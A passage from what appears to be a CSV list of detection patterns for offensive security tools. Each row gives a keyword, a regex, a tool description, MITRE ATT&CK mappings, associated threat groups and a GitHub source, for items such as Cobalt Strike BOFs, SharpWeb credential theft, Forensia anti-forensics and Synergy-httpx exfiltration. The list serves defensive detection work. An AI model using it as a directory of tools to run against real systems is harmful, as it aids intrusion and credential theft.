"*SweetPotato.ImpersonationToken*",".{0,1000}SweetPotato\.ImpersonationToken.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60708"
"*SweetPotato.sln*",".{0,1000}SweetPotato\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60709"
"*SweetPotato-N*.exe*",".{0,1000}SweetPotato\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","60710"
"*sweetsoftware/Ares*",".{0,1000}sweetsoftware\/Ares.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","60711"
"*swikipedia@onionmail.org*",".{0,1000}swikipedia\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","60712"
"*swisskyrepo/SharpLAPS*",".{0,1000}swisskyrepo\/SharpLAPS.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","60713"
"*swisskyrepo/SSRFmap*",".{0,1000}swisskyrepo\/SSRFmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60714"
"*Switching To Event Tracing Disabler Module*",".{0,1000}Switching\sTo\sEvent\sTracing\sDisabler\sModule.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60716"
"*Switching To NTFS Last Access Time Disabler*",".{0,1000}Switching\sTo\sNTFS\sLast\sAccess\sTime\sDisabler.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60717"
"*Switching To Prefetch Disabler*",".{0,1000}Switching\sTo\sPrefetch\sDisabler.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60718"
"*Switching To ShellBag Remover*",".{0,1000}Switching\sTo\sShellBag\sRemover.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60719"
"*Switching To USNJrnl Disabling Module*",".{0,1000}Switching\sTo\sUSNJrnl\sDisabling\sModule.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60720"
"*Switching To Windows Event Log Disabler*",".{0,1000}Switching\sTo\sWindows\sEvent\sLog\sDisabler.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","0","#content","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","60721"
"*SwitchPriv.exe*",".{0,1000}SwitchPriv\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","60722"
"*SxNade/Rudrastra*",".{0,1000}SxNade\/Rudrastra.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","60723"
"*sxxuJBrIRnKNqcH6xJNmUc/7lE0UOrgWJ2vMbaAoR4c=*",".{0,1000}sxxuJBrIRnKNqcH6xJNmUc\/7lE0UOrgWJ2vMbaAoR4c\=.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#base64","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","60724"
"*syhunt.com/sandcat/*",".{0,1000}syhunt\.com\/sandcat\/.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","60725"
"*syhunt/sandcat*",".{0,1000}syhunt\/sandcat.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","60726"
"*syhunt-sandcat-*.exe*",".{0,1000}syhunt\-sandcat\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sandcat","An open-source pentest oriented web browser","T1216 - T1590 - T1071","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/syhunt/sandcat","1","1","N/A","N/A","6","6","525","72","2023-12-21T18:40:27Z","2014-05-20T23:36:21Z","60727"
"*synacktiv/DLHell*",".{0,1000}synacktiv\/DLHell.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","1","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","60728"
"*synacktiv/GPOddity*",".{0,1000}synacktiv\/GPOddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","1","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","60729"
"*synacktiv/Invoke-RunAsWithCert*",".{0,1000}synacktiv\/Invoke\-RunAsWithCert.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","1","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","60730"
"*synacktiv/ntdissector*",".{0,1000}synacktiv\/ntdissector.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","N/A","9","2","139","17","2024-08-16T14:18:35Z","2023-09-05T12:13:47Z","60731"
"*synacktiv/OUned*",".{0,1000}synacktiv\/OUned.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","60732"
"*synacktiv/SCCMSecrets*",".{0,1000}synacktiv\/SCCMSecrets.{0,1000}","offensive_tool_keyword","SCCMSecrets","SCCMSecrets.py aims at exploiting SCCM policies distribution for credentials harvesting - initial access and lateral movement.","T1555 - T1078 - T1070 - T1021","TA0006 - TA0008 - TA0001","N/A","N/A","Lateral Movement","https://github.com/synacktiv/SCCMSecrets","1","1","N/A","N/A","8","3","208","22","2024-12-17T14:29:39Z","2024-08-14T09:45:44Z","60733"
"*synacktiv_gpoddity*",".{0,1000}synacktiv_gpoddity.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","60734"
"*sync-starkiller*",".{0,1000}sync\-starkiller.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60735"
"*synergy_httpx.py*",".{0,1000}synergy_httpx\.py.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","60739"
"*Synergy-httpx-main*",".{0,1000}Synergy\-httpx\-main.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","N/A","8","2","129","17","2024-07-19T06:40:59Z","2023-06-02T10:06:41Z","60740"
"*syscall_disable_priv *",".{0,1000}syscall_disable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","60741"
"*syscall_enable_priv *",".{0,1000}syscall_enable_priv\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Syscall BOF to arbitrarily add/detract process token privilege rights.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF","1","0","N/A","N/A","10","10","55","20","2024-07-10T16:20:39Z","2021-09-14T17:47:08Z","60742"
"*syscall_inject.rb*",".{0,1000}syscall_inject\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60743"
"*syscalls.asm*",".{0,1000}syscalls\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","N/A","10","10","315","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z","60744"
"*syscalls.nim*",".{0,1000}syscalls\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","60745"
"*syscalls_dump.*",".{0,1000}syscalls_dump\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60746"
"*syscalls_inject *",".{0,1000}syscalls_inject\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","0","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","60747"
"*syscalls_inject.*",".{0,1000}syscalls_inject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 